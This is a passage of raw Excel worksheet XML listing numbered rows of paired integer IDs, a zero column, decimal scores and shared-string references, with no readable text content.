        <v>7</v>
      </c>
      <c r="G1411" t="s">
        <v>2786</v>
      </c>
      <c r="H1411" t="s">
        <v>2787</v>
      </c>
    </row>
    <row r="1412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1412" s="1">
        <v>1410</v>
      </c>
      <c r="B1412">
        <v>5014</v>
      </c>
      <c r="C1412">
        <v>5014</v>
      </c>
      <c r="D1412">
        <v>0</v>
      </c>
      <c r="E1412">
        <v>0.99830001592636108</v>
      </c>
      <c r="F1412" t="s">
        <v>7</v>
      </c>
      <c r="G1412" t="s">
        <v>2788</v>
      </c>
      <c r="H1412" t="s">
        <v>2789</v>
      </c>
    </row>
    <row r="1413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1413" s="1">
        <v>1411</v>
      </c>
      <c r="B1413">
        <v>5015</v>
      </c>
      <c r="C1413">
        <v>5015</v>
      </c>
      <c r="D1413">
        <v>0</v>
      </c>
      <c r="E1413">
        <v>0.99860000610351563</v>
      </c>
      <c r="F1413" t="s">
        <v>7</v>
      </c>
      <c r="G1413" t="s">
        <v>2790</v>
      </c>
      <c r="H1413" t="s">
        <v>2791</v>
      </c>
    </row>
    <row r="1414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1414" s="1">
        <v>1412</v>
      </c>
      <c r="B1414">
        <v>5016</v>
      </c>
      <c r="C1414">
        <v>5016</v>
      </c>
      <c r="D1414">
        <v>0</v>
      </c>
      <c r="E1414">
        <v>0.98479998111724854</v>
      </c>
      <c r="F1414" t="s">
        <v>7</v>
      </c>
      <c r="G1414" t="s">
        <v>2792</v>
      </c>
      <c r="H1414" t="s">
        <v>2793</v>
      </c>
    </row>
    <row r="1415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1415" s="1">
        <v>1413</v>
      </c>
      <c r="B1415">
        <v>7453</v>
      </c>
      <c r="C1415">
        <v>7453</v>
      </c>
      <c r="D1415">
        <v>0</v>
      </c>
      <c r="E1415">
        <v>0.98739999532699585</v>
      </c>
      <c r="F1415" t="s">
        <v>7</v>
      </c>
      <c r="G1415" t="s">
        <v>2794</v>
      </c>
      <c r="H1415" t="s">
        <v>2795</v>
      </c>
    </row>
    <row r="1416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1416" s="1">
        <v>1414</v>
      </c>
      <c r="B1416">
        <v>7458</v>
      </c>
      <c r="C1416">
        <v>7458</v>
      </c>
      <c r="D1416">
        <v>0</v>
      </c>
      <c r="E1416">
        <v>0.60699999332427979</v>
      </c>
      <c r="F1416" t="s">
        <v>7</v>
      </c>
      <c r="G1416" t="s">
        <v>2796</v>
      </c>
      <c r="H1416" t="s">
        <v>2797</v>
      </c>
    </row>
    <row r="1417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1417" s="1">
        <v>1415</v>
      </c>
      <c r="B1417">
        <v>86</v>
      </c>
      <c r="C1417">
        <v>86</v>
      </c>
      <c r="D1417">
        <v>0</v>
      </c>
      <c r="E1417">
        <v>0.59460002183914185</v>
      </c>
      <c r="F1417" t="s">
        <v>7</v>
      </c>
      <c r="G1417" t="s">
        <v>2798</v>
      </c>
      <c r="H1417" t="s">
        <v>2799</v>
      </c>
    </row>
    <row r="1418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1418" s="1">
        <v>1416</v>
      </c>
      <c r="B1418">
        <v>5020</v>
      </c>
      <c r="C1418">
        <v>5020</v>
      </c>
      <c r="D1418">
        <v>0</v>
      </c>
      <c r="E1418">
        <v>0.81290000677108765</v>
      </c>
      <c r="F1418" t="s">
        <v>7</v>
      </c>
      <c r="G1418" t="s">
        <v>2800</v>
      </c>
      <c r="H1418" t="s">
        <v>2801</v>
      </c>
    </row>
    <row r="1419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1419" s="1">
        <v>1417</v>
      </c>
      <c r="B1419">
        <v>5021</v>
      </c>
      <c r="C1419">
        <v>5021</v>
      </c>
      <c r="D1419">
        <v>0</v>
      </c>
      <c r="E1419">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1419" t="s">
        <v>7</v>
      </c>
      <c r="G1419" t="s">
        <v>2802</v>
      </c>
      <c r="H1419" t="s">
        <v>2803</v>
      </c>
    </row>
    <row r="1420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1420" s="1">
        <v>1418</v>
      </c>
      <c r="B1420">
        <v>7461</v>
      </c>
      <c r="C1420">
        <v>7461</v>
      </c>
      <c r="D1420">
        <v>0</v>
      </c>
      <c r="E1420">
        <v>0.89380002021789551</v>
      </c>
      <c r="F1420" t="s">
        <v>7</v>
      </c>
      <c r="G1420" t="s">
        <v>2804</v>
      </c>
      <c r="H1420" t="s">
        <v>2805</v>
      </c>
    </row>
    <row r="1421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1421" s="1">
        <v>1419</v>
      </c>
      <c r="B1421">
        <v>1026</v>
      </c>
      <c r="C1421">
        <v>1026</v>
      </c>
      <c r="D1421">
        <v>0</v>
      </c>
      <c r="E1421">
        <v>0.89139997959136963</v>
      </c>
      <c r="F1421" t="s">
        <v>7</v>
      </c>
      <c r="G1421" t="s">
        <v>2806</v>
      </c>
      <c r="H1421" t="s">
        <v>2807</v>
      </c>
    </row>
    <row r="1422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1422" s="1">
        <v>1420</v>
      </c>
      <c r="B1422">
        <v>1028</v>
      </c>
      <c r="C1422">
        <v>1028</v>
      </c>
      <c r="D1422">
        <v>0</v>
      </c>
      <c r="E1422">
        <v>0.98979997634887695</v>
      </c>
      <c r="F1422" t="s">
        <v>7</v>
      </c>
      <c r="G1422" t="s">
        <v>2808</v>
      </c>
      <c r="H1422" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="1423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1423" s="1">
        <v>1421</v>
      </c>
      <c r="B1423">
        <v>5006</v>
      </c>
      <c r="C1423">
        <v>5006</v>
      </c>
      <c r="D1423">
        <v>0</v>
      </c>
      <c r="E1423">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1423" t="s">
        <v>7</v>
      </c>
      <c r="G1423" t="s">
        <v>2809</v>
      </c>
      <c r="H1423" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1424" s="1">
        <v>1422</v>
      </c>
      <c r="B1424">
        <v>5005</v>
      </c>
      <c r="C1424">
        <v>5005</v>
      </c>
      <c r="D1424">
        <v>0</v>
      </c>
      <c r="E1424">
        <v>0.74580001831054688</v>
      </c>
      <c r="F1424" t="s">
        <v>7</v>
      </c>
      <c r="G1424" t="s">
        <v>2810</v>
      </c>
      <c r="H1424" t="s">
        <v>2811</v>
      </c>
    </row>
    <row r="1425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1425" s="1">
        <v>1423</v>
      </c>
      <c r="B1425">
        <v>311</v>
      </c>
      <c r="C1425">
        <v>311</v>
      </c>
      <c r="D1425">
        <v>0</v>
      </c>
      <c r="E1425">
        <v>0.98000001907348633</v>
      </c>
      <c r="F1425" t="s">
        <v>7</v>
      </c>
      <c r="G1425" t="s">
        <v>2812</v>
      </c>
      <c r="H1425" t="s">
        <v>2813</v>
      </c>
    </row>
    <row r="1426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1426" s="1">
        <v>1424</v>
      </c>
      <c r="B1426">
        <v>5537</v>
      </c>
      <c r="C1426">
        <v>5537</v>
      </c>
      <c r="D1426">
        <v>0</v>
      </c>
      <c r="E1426">
        <v>0.67839998006820679</v>
      </c>
      <c r="F1426" t="s">
        <v>7</v>
      </c>
      <c r="G1426" t="s">
        <v>2814</v>
      </c>
      <c r="H1426" t="s">
        <v>2815</v>
      </c>
    </row>
    <row r="1427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1427" s="1">
        <v>1425</v>
      </c>
      <c r="B1427">
        <v>4989</v>
      </c>
      <c r="C1427">
        <v>4989</v>
      </c>
      <c r="D1427">
        <v>0</v>
      </c>
      <c r="E1427">
        <v>0.53390002250671387</v>
      </c>
      <c r="F1427" t="s">
        <v>7</v>
      </c>
      <c r="G1427" t="s">
        <v>2816</v>
      </c>
      <c r="H1427" t="s">
        <v>2817</v>
      </c>
    </row>
    <row r="1428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1428" s="1">
        <v>1426</v>
      </c>
      <c r="B1428">
        <v>310</v>
      </c>
      <c r="C1428">
        <v>310</v>
      </c>
      <c r="D1428">
        <v>0</v>
      </c>
      <c r="E1428">
        <v>0.73079997301101685</v>
      </c>
      <c r="F1428" t="s">
        <v>7</v>
      </c>
      <c r="G1428" t="s">
        <v>2818</v>
      </c>
      <c r="H1428" t="s">
        <v>2819</v>
      </c>
    </row>
    <row r="1429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1429" s="1">
        <v>1427</v>
      </c>
      <c r="B1429">
        <v>4991</v>
      </c>
      <c r="C1429">
        <v>4991</v>
      </c>
      <c r="D1429">
        <v>0</v>
      </c>
      <c r="E1429">
        <v>0.77579998970031738</v>
      </c>
      <c r="F1429" t="s">
        <v>7</v>
      </c>
      <c r="G1429" t="s">
        <v>2820</v>
      </c>
      <c r="H1429" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="1430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1430" s="1">
        <v>1428</v>
      </c>
      <c r="B1430">
        <v>1052</v>
      </c>
      <c r="C1430">
        <v>1052</v>
      </c>
      <c r="D1430">
        <v>0</v>
      </c>
      <c r="E1430">
        <v>0.55229997634887695</v>
      </c>
      <c r="F1430" t="s">
        <v>7</v>
      </c>
      <c r="G1430" t="s">
        <v>2822</v>
      </c>
      <c r="H1430" t="s">
        <v>2823</v>
      </c>
    </row>
    <row r="1431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1431" s="1">
        <v>1429</v>
      </c>
      <c r="B1431">
        <v>1051</v>
      </c>
      <c r="C1431">
        <v>1051</v>
      </c>
      <c r="D1431">
        <v>0</v>
      </c>
      <c r="E1431">
        <v>0.99419999122619629</v>
      </c>
      <c r="F1431" t="s">
        <v>7</v>
      </c>
      <c r="G1431" t="s">
        <v>2824</v>
      </c>
      <c r="H1431" t="s">
        <v>2825</v>
      </c>
    </row>
    <row r="1432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1432" s="1">
        <v>1430</v>
      </c>
      <c r="B1432">
        <v>506</v>
      </c>
      <c r="C1432">
        <v>506</v>
      </c>
      <c r="D1432">
        <v>0</v>
      </c>
      <c r="E1432">
        <v>0.87230002880096436</v>
      </c>
      <c r="F1432" t="s">
        <v>7</v>
      </c>
      <c r="G1432" t="s">
        <v>2826</v>
      </c>
      <c r="H1432" t="s">
        <v>2827</v>
      </c>
    </row>
    <row r="1433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1433" s="1">
        <v>1431</v>
      </c>
      <c r="B1433">
        <v>5811</v>
      </c>
      <c r="C1433">
        <v>5811</v>
      </c>
      <c r="D1433">
        <v>0</v>
      </c>
      <c r="E1433">
        <v>0.83340001106262207</v>
      </c>
      <c r="F1433" t="s">
        <v>7</v>
      </c>
      <c r="G1433" t="s">
        <v>2828</v>
      </c>
      <c r="H1433" t="s">
        <v>2829</v>
      </c>
    </row>
    <row r="1434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1434" s="1">
        <v>1432</v>
      </c>
      <c r="B1434">
        <v>1048</v>
      </c>
      <c r="C1434">
        <v>1048</v>
      </c>
      <c r="D1434">
        <v>0</v>
      </c>
      <c r="E1434">
        <v>0.58730000257492065</v>
      </c>
      <c r="F1434" t="s">
        <v>7</v>
      </c>
      <c r="G1434" t="s">
        <v>2830</v>
      </c>
      <c r="H1434" t="s">
        <v>2831</v>
      </c>
    </row>
    <row r="1435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1435" s="1">
        <v>1433</v>
      </c>
      <c r="B1435">
        <v>5022</v>
      </c>
      <c r="C1435">
        <v>5022</v>
      </c>
      <c r="D1435">
        <v>0</v>
      </c>
      <c r="E1435">
        <v>0.5559999942779541</v>
      </c>
      <c r="F1435" t="s">
        <v>7</v>
      </c>
      <c r="G1435" t="s">
        <v>2832</v>
      </c>
      <c r="H1435" t="s">
        <v>2833</v>
      </c>
    </row>
    <row r="1436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1436" s="1">
        <v>1434</v>
      </c>
      <c r="B1436">
        <v>507</v>
      </c>
      <c r="C1436">
        <v>507</v>
      </c>
      <c r="D1436">
        <v>0</v>
      </c>
      <c r="E1436">
        <v>0.73329997062683105</v>
      </c>
      <c r="F1436" t="s">
        <v>7</v>
      </c>
      <c r="G1436" t="s">
        <v>2834</v>
      </c>
      <c r="H1436" t="s">
        <v>2835</v>
      </c>
    </row>
    <row r="1437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1437" s="1">
        <v>1435</v>
      </c>
      <c r="B1437">
        <v>1043</v>
      </c>
      <c r="C1437">
        <v>1043</v>
      </c>
      <c r="D1437">
        <v>0</v>
      </c>
      <c r="E1437">
        <v>0.99489998817443848</v>
      </c>
      <c r="F1437" t="s">
        <v>7</v>
      </c>
      <c r="G1437" t="s">
        <v>2836</v>
      </c>
      <c r="H1437" t="s">
        <v>2837</v>
      </c>
    </row>
    <row r="1438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1438" s="1">
        <v>1436</v>
      </c>
      <c r="B1438">
        <v>509</v>
      </c>
      <c r="C1438">
        <v>509</v>
      </c>
      <c r="D1438">
        <v>0</v>
      </c>
      <c r="E1438">
        <v>0.98919999599456787</v>
      </c>
      <c r="F1438" t="s">
        <v>7</v>
      </c>
      <c r="G1438" t="s">
        <v>2838</v>
      </c>
      <c r="H1438" t="s">
        <v>2839</v>
      </c>
    </row>
    <row r="1439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1439" s="1">
        <v>1437</v>
      </c>
      <c r="B1439">
        <v>510</v>
      </c>
      <c r="C1439">
        <v>510</v>
      </c>
      <c r="D1439">
        <v>0</v>
      </c>
      <c r="E1439">
        <v>0.69660001993179321</v>
      </c>
      <c r="F1439" t="s">
        <v>7</v>
      </c>
      <c r="G1439" t="s">
        <v>2840</v>
      </c>
      <c r="H1439" t="s">
        <v>2841</v>
      </c>
    </row>
    <row r="1440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1440" s="1">
        <v>1438</v>
      </c>
      <c r="B1440">
        <v>7697</v>
      </c>
      <c r="C1440">
        <v>7697</v>
      </c>
      <c r="D1440">
        <v>0</v>
      </c>
      <c r="E1440">
        <v>0.51340001821517944</v>
      </c>
      <c r="F1440" t="s">
        <v>7</v>
      </c>
      <c r="G1440" t="s">
        <v>2842</v>
      </c>
      <c r="H1440" t="s">
        <v>2843</v>
      </c>
    </row>
    <row r="1441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1441" s="1">
        <v>1439</v>
      </c>
      <c r="B1441">
        <v>5002</v>
      </c>
      <c r="C1441">
        <v>5002</v>
      </c>
      <c r="D1441">
        <v>0</v>
      </c>
      <c r="E1441">
        <v>0.76980000734329224</v>
      </c>
      <c r="F1441" t="s">
        <v>7</v>
      </c>
      <c r="G1441" t="s">
        <v>2844</v>
      </c>
      <c r="H1441" t="s">
        <v>2845</v>
      </c>
    </row>
    <row r="1442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1442" s="1">
        <v>1440</v>
      </c>
      <c r="B1442">
        <v>5003</v>
      </c>
      <c r="C1442">
        <v>5003</v>
      </c>
      <c r="D1442">
        <v>0</v>
      </c>
      <c r="E1442">
        <v>0.97839999198913574</v>
      </c>
      <c r="F1442" t="s">
        <v>7</v>
      </c>
      <c r="G1442" t="s">
        <v>2846</v>
      </c>
      <c r="H1442" t="s">
        <v>2847</v>
      </c>
    </row>
    <row r="1443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1443" s="1">
        <v>1441</v>
      </c>
      <c r="B1443">
        <v>7440</v>
      </c>
      <c r="C1443">
        <v>7440</v>
      </c>
      <c r="D1443">
        <v>0</v>
      </c>
      <c r="E1443">
        <v>0.65759998559951782</v>
      </c>
      <c r="F1443" t="s">
        <v>7</v>
      </c>
      <c r="G1443" t="s">
        <v>2848</v>
      </c>
      <c r="H1443" t="s">
        <v>2849</v>
      </c>
    </row>
    <row r="1444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1444" s="1">
        <v>1442</v>
      </c>
      <c r="B1444">
        <v>7441</v>
      </c>
      <c r="C1444">
        <v>7441</v>
      </c>
      <c r="D1444">
        <v>0</v>
      </c>
      <c r="E1444">
        <v>0.70599997043609619</v>
      </c>
      <c r="F1444" t="s">
        <v>7</v>
      </c>
      <c r="G1444" t="s">
        <v>2850</v>
      </c>
      <c r="H1444" t="s">
        <v>2851</v>
      </c>
    </row>
    <row r="1445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1445" s="1">
        <v>1443</v>
      </c>
      <c r="B1445">
        <v>7442</v>
      </c>
      <c r="C1445">
        <v>7442</v>
      </c>
      <c r="D1445">
        <v>0</v>
      </c>
      <c r="E1445">
        <v>0.45480000972747803</v>
      </c>
      <c r="F1445" t="s">
        <v>7</v>
      </c>
      <c r="G1445" t="s">
        <v>2852</v>
      </c>
      <c r="H1445" t="s">
        <v>2853</v>
      </c>
    </row>
    <row r="1446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1446" s="1">
        <v>1444</v>
      </c>
      <c r="B1446">
        <v>7443</v>
      </c>
      <c r="C1446">
        <v>7443</v>
      </c>
      <c r="D1446">
        <v>0</v>
      </c>
      <c r="E1446">
        <v>0.66640001535415649</v>
      </c>
      <c r="F1446" t="s">
        <v>7</v>
      </c>
      <c r="G1446" t="s">
        <v>2854</v>
      </c>
      <c r="H1446" t="s">
        <v>2855</v>
      </c>
    </row>
    <row r="1447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1447" s="1">
        <v>1445</v>
      </c>
      <c r="B1447">
        <v>7699</v>
      </c>
      <c r="C1447">
        <v>7699</v>
      </c>
      <c r="D1447">
        <v>0</v>
      </c>
      <c r="E1447">
        <v>0.43270000815391541</v>
      </c>
      <c r="F1447" t="s">
        <v>7</v>
      </c>
      <c r="G1447" t="s">
        <v>2856</v>
      </c>
      <c r="H1447" t="s">
        <v>2857</v>
      </c>
    </row>
    <row r="1448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1448" s="1">
        <v>1446</v>
      </c>
      <c r="B1448">
        <v>954</v>
      </c>
      <c r="C1448">
        <v>954</v>
      </c>
      <c r="D1448">
        <v>0</v>
      </c>
      <c r="E1448">
        <v>0.46039998531341553</v>
      </c>
      <c r="F1448" t="s">
        <v>7</v>
      </c>
      <c r="G1448" t="s">
        <v>2858</v>
      </c>
      <c r="H1448" t="s">
        <v>2859</v>
      </c>
    </row>
    <row r="1449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1449" s="1">
        <v>1447</v>
      </c>
      <c r="B1449">
        <v>7877</v>
      </c>
      <c r="C1449">
        <v>7877</v>
      </c>
      <c r="D1449">
        <v>0</v>
      </c>
      <c r="E1449">
        <v>0.58020001649856567</v>
      </c>
      <c r="F1449" t="s">
        <v>7</v>
      </c>
      <c r="G1449" t="s">
        <v>2860</v>
      </c>
      <c r="H1449" t="s">
        <v>2861</v>
      </c>
    </row>
    <row r="1450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1450" s="1">
        <v>1448</v>
      </c>
      <c r="B1450">
        <v>526</v>
      </c>
      <c r="C1450">
        <v>526</v>
      </c>
      <c r="D1450">
        <v>0</v>
      </c>
      <c r="E1450">
        <v>0.99370002746582031</v>
      </c>
      <c r="F1450" t="s">
        <v>7</v>
      </c>
      <c r="G1450" t="s">
        <v>2862</v>
      </c>
      <c r="H1450" t="s">
        <v>2863</v>
      </c>
    </row>
    <row r="1451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1451" s="1">
        <v>1449</v>
      </c>
      <c r="B1451">
        <v>301</v>
      </c>
      <c r="C1451">
        <v>301</v>
      </c>
      <c r="D1451">
        <v>0</v>
      </c>
      <c r="E1451">
        <v>0.90729999542236328</v>
      </c>
      <c r="F1451" t="s">
        <v>7</v>
      </c>
      <c r="G1451" t="s">
        <v>2864</v>
      </c>
      <c r="H1451" t="s">
        <v>2865</v>
      </c>
    </row>
    <row r="1452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1452" s="1">
        <v>1450</v>
      </c>
      <c r="B1452">
        <v>5038</v>
      </c>
      <c r="C1452">
        <v>5038</v>
      </c>
      <c r="D1452">
        <v>0</v>
      </c>
      <c r="E1452">
        <v>0.99730002880096436</v>
      </c>
      <c r="F1452" t="s">
        <v>7</v>
      </c>
      <c r="G1452" t="s">
        <v>2866</v>
      </c>
      <c r="H1452" t="s">
        <v>2867</v>
      </c>
    </row>
    <row r="1453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1453" s="1">
        <v>1451</v>
      </c>
      <c r="B1453">
        <v>7474</v>
      </c>
      <c r="C1453">
        <v>7474</v>
      </c>
      <c r="D1453">
        <v>0</v>
      </c>
      <c r="E1453">
        <v>0.96670001745223999</v>
      </c>
      <c r="F1453" t="s">
        <v>7</v>
      </c>
      <c r="G1453" t="s">
        <v>2868</v>
      </c>
      <c r="H1453" t="s">
        <v>2869</v>
      </c>
    </row>
    <row r="1454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1454" s="1">
        <v>1452</v>
      </c>
      <c r="B1454">
        <v>5039</v>
      </c>
      <c r="C1454">
        <v>5039</v>
      </c>
      <c r="D1454">
        <v>0</v>
      </c>
      <c r="E1454">
        <v>0.99709999561309814</v>
      </c>
      <c r="F1454" t="s">
        <v>7</v>
      </c>
      <c r="G1454" t="s">
        <v>2870</v>
      </c>
      <c r="H1454" t="s">
        <v>2871</v>
      </c>
    </row>
    <row r="1455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1455" s="1">
        <v>1453</v>
      </c>
      <c r="B1455">
        <v>7475</v>
      </c>
      <c r="C1455">
        <v>7475</v>
      </c>
      <c r="D1455">
        <v>0</v>
      </c>
      <c r="E1455">
        <v>0.63380002975463867</v>
      </c>
      <c r="F1455" t="s">
        <v>7</v>
      </c>
      <c r="G1455" t="s">
        <v>2872</v>
      </c>
      <c r="H1455" t="s">
        <v>2873</v>
      </c>
    </row>
    <row r="1456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1456" s="1">
        <v>1454</v>
      </c>
      <c r="B1456">
        <v>971</v>
      </c>
      <c r="C1456">
        <v>971</v>
      </c>
      <c r="D1456">
        <v>0</v>
      </c>
      <c r="E1456">
        <v>0.99430000782012939</v>
      </c>
      <c r="F1456" t="s">
        <v>7</v>
      </c>
      <c r="G1456" t="s">
        <v>2874</v>
      </c>
      <c r="H1456" t="s">
        <v>2875</v>
      </c>
    </row>
    <row r="1457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1457" s="1">
        <v>1455</v>
      </c>
      <c r="B1457">
        <v>970</v>
      </c>
      <c r="C1457">
        <v>970</v>
      </c>
      <c r="D1457">
        <v>0</v>
      </c>
      <c r="E1457">
        <v>0.85320001840591431</v>
      </c>
      <c r="F1457" t="s">
        <v>7</v>
      </c>
      <c r="G1457" t="s">
        <v>2876</v>
      </c>
      <c r="H1457" t="s">
        <v>2877</v>
      </c>
    </row>
    <row r="1458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1458" s="1">
        <v>1456</v>
      </c>
      <c r="B1458">
        <v>5040</v>
      </c>
      <c r="C1458">
        <v>5040</v>
      </c>
      <c r="D1458">
        <v>0</v>
      </c>
      <c r="E1458">
        <v>0.71719998121261597</v>
      </c>
      <c r="F1458" t="s">
        <v>7</v>
      </c>
      <c r="G1458" t="s">
        <v>2878</v>
      </c>
      <c r="H1458" t="s">
        <v>2879</v>
      </c>
    </row>
    <row r="1459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1459" s="1">
        <v>1457</v>
      </c>
      <c r="B1459">
        <v>5595</v>
      </c>
      <c r="C1459">
        <v>5595</v>
      </c>
      <c r="D1459">
        <v>0</v>
      </c>
      <c r="E1459">
        <v>0.50029999017715454</v>
      </c>
      <c r="F1459" t="s">
        <v>7</v>
      </c>
      <c r="G1459" t="s">
        <v>2880</v>
      </c>
      <c r="H1459" t="s">
        <v>2881</v>
      </c>
    </row>
    <row r="1460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1460" s="1">
        <v>1458</v>
      </c>
      <c r="B1460">
        <v>966</v>
      </c>
      <c r="C1460">
        <v>966</v>
      </c>
      <c r="D1460">
        <v>0</v>
      </c>
      <c r="E1460">
        <v>0.5429999828338623</v>
      </c>
      <c r="F1460" t="s">
        <v>7</v>
      </c>
      <c r="G1460" t="s">
        <v>2882</v>
      </c>
      <c r="H1460" t="s">
        <v>2883</v>
      </c>
    </row>
    <row r="1461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1461" s="1">
        <v>1459</v>
      </c>
      <c r="B1461">
        <v>5042</v>
      </c>
      <c r="C1461">
        <v>5042</v>
      </c>
      <c r="D1461">
        <v>0</v>
      </c>
      <c r="E1461">
        <v>0.98259997367858887</v>
      </c>
      <c r="F1461" t="s">
        <v>7</v>
      </c>
      <c r="G1461" t="s">
        <v>2884</v>
      </c>
      <c r="H1461" t="s">
        <v>2885</v>
      </c>
    </row>
    <row r="1462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1462" s="1">
        <v>1460</v>
      </c>
      <c r="B1462">
        <v>5043</v>
      </c>
      <c r="C1462">
        <v>5043</v>
      </c>
      <c r="D1462">
        <v>0</v>
      </c>
      <c r="E1462">
        <v>0.98269999027252197</v>
      </c>
      <c r="F1462" t="s">
        <v>7</v>
      </c>
      <c r="G1462" t="s">
        <v>2886</v>
      </c>
      <c r="H1462" t="s">
        <v>2887</v>
      </c>
    </row>
    <row r="1463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1463" s="1">
        <v>1461</v>
      </c>
      <c r="B1463">
        <v>299</v>
      </c>
      <c r="C1463">
        <v>299</v>
      </c>
      <c r="D1463">
        <v>0</v>
      </c>
      <c r="E1463">
        <v>0.89950001239776611</v>
      </c>
      <c r="F1463" t="s">
        <v>7</v>
      </c>
      <c r="G1463" t="s">
        <v>2888</v>
      </c>
      <c r="H1463" t="s">
        <v>2889</v>
      </c>
    </row>
    <row r="1464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1464" s="1">
        <v>1462</v>
      </c>
      <c r="B1464">
        <v>7482</v>
      </c>
      <c r="C1464">
        <v>7482</v>
      </c>
      <c r="D1464">
        <v>0</v>
      </c>
      <c r="E1464">
        <v>0.98820000886917114</v>
      </c>
      <c r="F1464" t="s">
        <v>7</v>
      </c>
      <c r="G1464" t="s">
        <v>2890</v>
      </c>
      <c r="H1464" t="s">
        <v>2891</v>
      </c>
    </row>
    <row r="1465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1465" s="1">
        <v>1463</v>
      </c>
      <c r="B1465">
        <v>5521</v>
      </c>
      <c r="C1465">
        <v>5521</v>
      </c>
      <c r="D1465">
        <v>0</v>
      </c>
      <c r="E1465">
        <v>0.9944000244140625</v>
      </c>
      <c r="F1465" t="s">
        <v>7</v>
      </c>
      <c r="G1465" t="s">
        <v>2892</v>
      </c>
      <c r="H1465" t="s">
        <v>2893</v>
      </c>
    </row>
    <row r="1466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1466" s="1">
        <v>1464</v>
      </c>
      <c r="B1466">
        <v>5044</v>
      </c>
      <c r="C1466">
        <v>5044</v>
      </c>
      <c r="D1466">
        <v>0</v>
      </c>
      <c r="E1466">
        <v>0.93680000305175781</v>
      </c>
      <c r="F1466" t="s">
        <v>7</v>
      </c>
      <c r="G1466" t="s">
        <v>2894</v>
      </c>
      <c r="H1466" t="s">
        <v>2895</v>
      </c>
    </row>
    <row r="1467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1467" s="1">
        <v>1465</v>
      </c>
      <c r="B1467">
        <v>7685</v>
      </c>
      <c r="C1467">
        <v>7685</v>
      </c>
      <c r="D1467">
        <v>0</v>
      </c>
      <c r="E1467">
        <v>0.51920002698898315</v>
      </c>
      <c r="F1467" t="s">
        <v>7</v>
      </c>
      <c r="G1467" t="s">
        <v>2896</v>
      </c>
      <c r="H1467" t="s">
        <v>2897</v>
      </c>
    </row>
    <row r="1468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1468" s="1">
        <v>1466</v>
      </c>
      <c r="B1468">
        <v>5047</v>
      </c>
      <c r="C1468">
        <v>5047</v>
      </c>
      <c r="D1468">
        <v>0</v>
      </c>
      <c r="E1468">
        <v>0.95910000801086426</v>
      </c>
      <c r="F1468" t="s">
        <v>7</v>
      </c>
      <c r="G1468" t="s">
        <v>2898</v>
      </c>
      <c r="H1468" t="s">
        <v>2899</v>
      </c>
    </row>
    <row r="1469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1469" s="1">
        <v>1467</v>
      </c>
      <c r="B1469">
        <v>5518</v>
      </c>
      <c r="C1469">
        <v>5518</v>
      </c>
      <c r="D1469">
        <v>0</v>
      </c>
      <c r="E1469">
        <v>0.95039999485015869</v>
      </c>
      <c r="F1469" t="s">
        <v>7</v>
      </c>
      <c r="G1469" t="s">
        <v>2900</v>
      </c>
      <c r="H1469" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="1470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1470" s="1">
        <v>1468</v>
      </c>
      <c r="B1470">
        <v>5048</v>
      </c>
      <c r="C1470">
        <v>5048</v>
